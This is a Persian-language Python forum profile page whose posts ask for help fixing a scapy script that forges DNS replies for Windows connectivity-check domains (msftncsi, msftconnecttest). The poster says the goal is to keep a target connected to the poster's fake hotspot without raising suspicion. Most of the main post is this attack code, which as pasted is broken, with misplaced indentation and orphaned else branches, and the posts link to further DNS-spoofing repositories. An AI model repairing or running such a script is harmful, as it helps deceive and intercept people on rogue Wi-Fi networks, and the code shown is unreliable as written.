Navigation

    انجمن پایتون فارسی

    • نام‌نویسی
    • درون آمدن
    • جستجو
    • دسته‌بندی‌ها
    • تازه‌ها
    • برچسب‌ها
    • دوست‌داشتنی‌ها
    • کاربران
    • گروه‌ها
    1. خانه
    2. axa
    A
    • پروفایل
    • دنبال‌شونده‌ها 0
    • دنبال‌کننده‌ها 2
    • موضوع ها 1
    • دیدگاه‌ها 5
    • بهترین 2
    • گروه‌ها 0

    axa

    @axa

    2
    اعتبار
    1
    بازدیدهای نمایه
    5
    دیدگاه‌ها
    2
    دنبال‌کننده‌ها
    0
    دنبال‌شونده‌ها
    عضو شده آخرین حضور

    axa دنبال نکن دنبال کن

    بهترین پست های axa

    • RE: مشکل IndentationError: expected an indented fix

      ممنونم از اینکه توجه کردید
      متاسفانه توسعه دهنده اسکریپت در دسترس نیست وگرنه مزاحم شما نمیشدم
      اسکریپت را در مسیر زیر آپلود کردم
      https://up.rashn.net/uploads/34234420.ncsifix.py.txt
      از سایت آنلاین کمک گرفتم و مشکل فاصله را حل کردم
      در خط های 43 و 77 خطا دریافت کردم که بنظر میگفت نباید else داشته باشید من آن خط را حذف کردم و آن خطا رفه شد
      اما در خط 8 خطا دریافت کردم
      Traceback (most recent call last):
      File “ncsifix.py”, line 8, in <module>
      if pkt.haslayer(DNSQR):
      NameError: name ‘pkt’ is not defined

      ممنون میشم اسکریپت را تست کنید
      لازمه اجرای اسکریپت داشتن لینوکس و نصب بسته scapy هست
      راجع به اسکریپت
      کار این اسکریپت جعل dns ویندوز هست
      زمانی که تارگت در ویندوز خودش به اکسس پوینت جعلی (هات اسپات) ما متصل میشه، اگر ما دسترسی اینترنت به او ندهیم خطای no internect connetion در زیر کانکشن خود مشاهده می‌کنه
      همین مورد باعث شک او میشه و از اکسس پوینت جدا می‌شه. خوب محقق اسکریپت، مسیری که باعث این خطا میشه را پیدا کرده و با استفاده از ابزار scapy قصد داره اون آدرس را جعل کنه.
      لطف می‌کنید اسکریپت را از روی متن بررسی کنید

      پست شده در پرسش و پاسخ
      A
      axa
    • RE: مشکل IndentationError: expected an indented fix

      سلام
      ممنونم از اینکه زمان گذاشتید و توجه کردید
      حتما روش فیکس شدنش را در انتهای تاپیک قرار میدم
      بازم ممنونم و همیشه موفق باشید

      پست شده در پرسش و پاسخ
      A
      axa

    آخرین پست های axa

    • RE: مشکل IndentationError: expected an indented fix

      سلام
      ممنونم از اینکه زمان گذاشتید و توجه کردید
      حتما روش فیکس شدنش را در انتهای تاپیک قرار میدم
      بازم ممنونم و همیشه موفق باشید

      پست شده در پرسش و پاسخ
      A
      axa
    • RE: مشکل IndentationError: expected an indented fix

      ممنونم محبت کردید
      من در فرم پایتون خارجی این مورد را پرسیدم و مشکل if را اطلاع دادند

      To which if does the else on line 43 belong? Probably to the if in line 27. But this if ends on line 30 because “spoofed_pkt” is not indented anymore. So this else belongs to nothing.

      https://python-forum.io/Thread-error-IndentationError-expected-an-indented-block
      از چندتا از توسعه دهندگان چنین اسکریپت‌هایی هم سوال کردم اما هنوز پاسخ ندادند

      اما اسکریپتی پیدا کردم که داخلش چنین کدی استفاده شده بود
      https://github.com/x4nth055/pythoncode-tutorials/blob/master/scapy/dns-spoof/dns_spoof.py
      https://github.com/mpostument/hacking_tools/blob/master/dns_spoof/dns_spoof.py

      ممنون میشم نگاهی به این اسکریپت‌ها بیندازید

      پست شده در پرسش و پاسخ
      A
      axa
    • RE: مشکل IndentationError: expected an indented fix

      سلام ممنونم، متاسفانه من در این زمینه دانش لازم را ندارم

      پست شده در پرسش و پاسخ
      A
      axa
    • RE: مشکل IndentationError: expected an indented fix

      ممنونم از اینکه توجه کردید
      متاسفانه توسعه دهنده اسکریپت در دسترس نیست وگرنه مزاحم شما نمیشدم
      اسکریپت را در مسیر زیر آپلود کردم
      https://up.rashn.net/uploads/34234420.ncsifix.py.txt
      از سایت آنلاین کمک گرفتم و مشکل فاصله را حل کردم
      در خط های 43 و 77 خطا دریافت کردم که بنظر میگفت نباید else داشته باشید من آن خط را حذف کردم و آن خطا رفه شد
      اما در خط 8 خطا دریافت کردم
      Traceback (most recent call last):
      File “ncsifix.py”, line 8, in <module>
      if pkt.haslayer(DNSQR):
      NameError: name ‘pkt’ is not defined

      ممنون میشم اسکریپت را تست کنید
      لازمه اجرای اسکریپت داشتن لینوکس و نصب بسته scapy هست
      راجع به اسکریپت
      کار این اسکریپت جعل dns ویندوز هست
      زمانی که تارگت در ویندوز خودش به اکسس پوینت جعلی (هات اسپات) ما متصل میشه، اگر ما دسترسی اینترنت به او ندهیم خطای no internect connetion در زیر کانکشن خود مشاهده می‌کنه
      همین مورد باعث شک او میشه و از اکسس پوینت جدا می‌شه. خوب محقق اسکریپت، مسیری که باعث این خطا میشه را پیدا کرده و با استفاده از ابزار scapy قصد داره اون آدرس را جعل کنه.
      لطف می‌کنید اسکریپت را از روی متن بررسی کنید

      پست شده در پرسش و پاسخ
      A
      axa
    • مشکل IndentationError: expected an indented fix

      سلام و عرض ادب
      من در اجرای این اسکریپت مشکلی دارم و خطای زیر را دریافت می‌کنم
      IndentationError: expected an indented fix

      بنظر مشکل از tab ها و فاصله ها هست
      متاسفانه نتونستم اصلاحش کنم
      ممنون میشم کمکم کنید

      کد

      from scapy.all import *
      DIR=os.path.dirname(os.path.abspath(__file__))
      print('Executed from '+DIR+'\n')
      print('Assuming interface wlan0mon')
      
      def FakeAccess2(pkt):
          pkt=pkt[0]
          if pkt.haslayer(DNSQR):
              print('Packet with DNSQR layer found.')
          if pkt[DNS].qd.qtype == 1:
              print('DNSQR type appears type = A')
          if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
          #MUST RETURN TRUE VALUE!    
              print('It appears captured DNS request requests dns.msftncsi.com')  
          spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
          IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
          an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
          del pkt[IP].chksum
          del pkt[UDP].chksum
          # replace your Fake AP interface with 'wlan0mon'
          sendp(spoofed_pkt,iface='wlan0mon')
              print('Spoofed response send:')
          spoofed_pkt.show2()
      
          if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:  
      #MUST POINT TO SERVER WITH connecttest.txt; ISTO NARED ZA IPV6
              print('It appears captured DNS request requests www.msftconnecttest.com')  
          spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
          IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
      # 192.168.1.254 mora bit GW nastiman za dhcp
          an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='192.168.1.254'))
          del pkt[IP].chksum
          del pkt[UDP].chksum
      
          sendp(spoofed_pkt,iface='wlan0mon')
              print('Spoofed response send:')
          spoofed_pkt.show2()
      
          else:
              print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)
      
          if pkt[DNS].qd.qtype == 28:
              print('DNSQR type appears type = AAAA')
          if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
          #MUST RETURN TRUE VALUE
              print('AAAA DNS request for dns.msftncsi.com found, loop works')
          spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
          IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
          an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))
          
          del pkt[IP].chksum
          del pkt[UDP].chksum
      
          sendp(spoofed_pkt,iface='wlan0mon')
          print('Spoofed response send:')
          spoofed_pkt.show2()
      
          if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
      #MUST RETURN TRUE VALUE
              print('AAAA DNS request for www.msftncsi.com found, loop works')
          spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
          IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
          an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
          #RDATA JE IPV6 OD wlan0mon
          del pkt[IP].chksum
          del pkt[UDP].chksum
      
          sendp(spoofed_pkt,iface='wlan0mon')
              print('Spoofed response send:')
          spoofed_pkt.show2()
      
          else:
              print('Captured packet has no DNSQR')
      
              print('Sniffing...')
      sniff(filter='dst port 53',prn=FakeAccess2, store=0, count=0, iface='wlan0mon')
      
      
      
      پست شده در پرسش و پاسخ
      A
      axa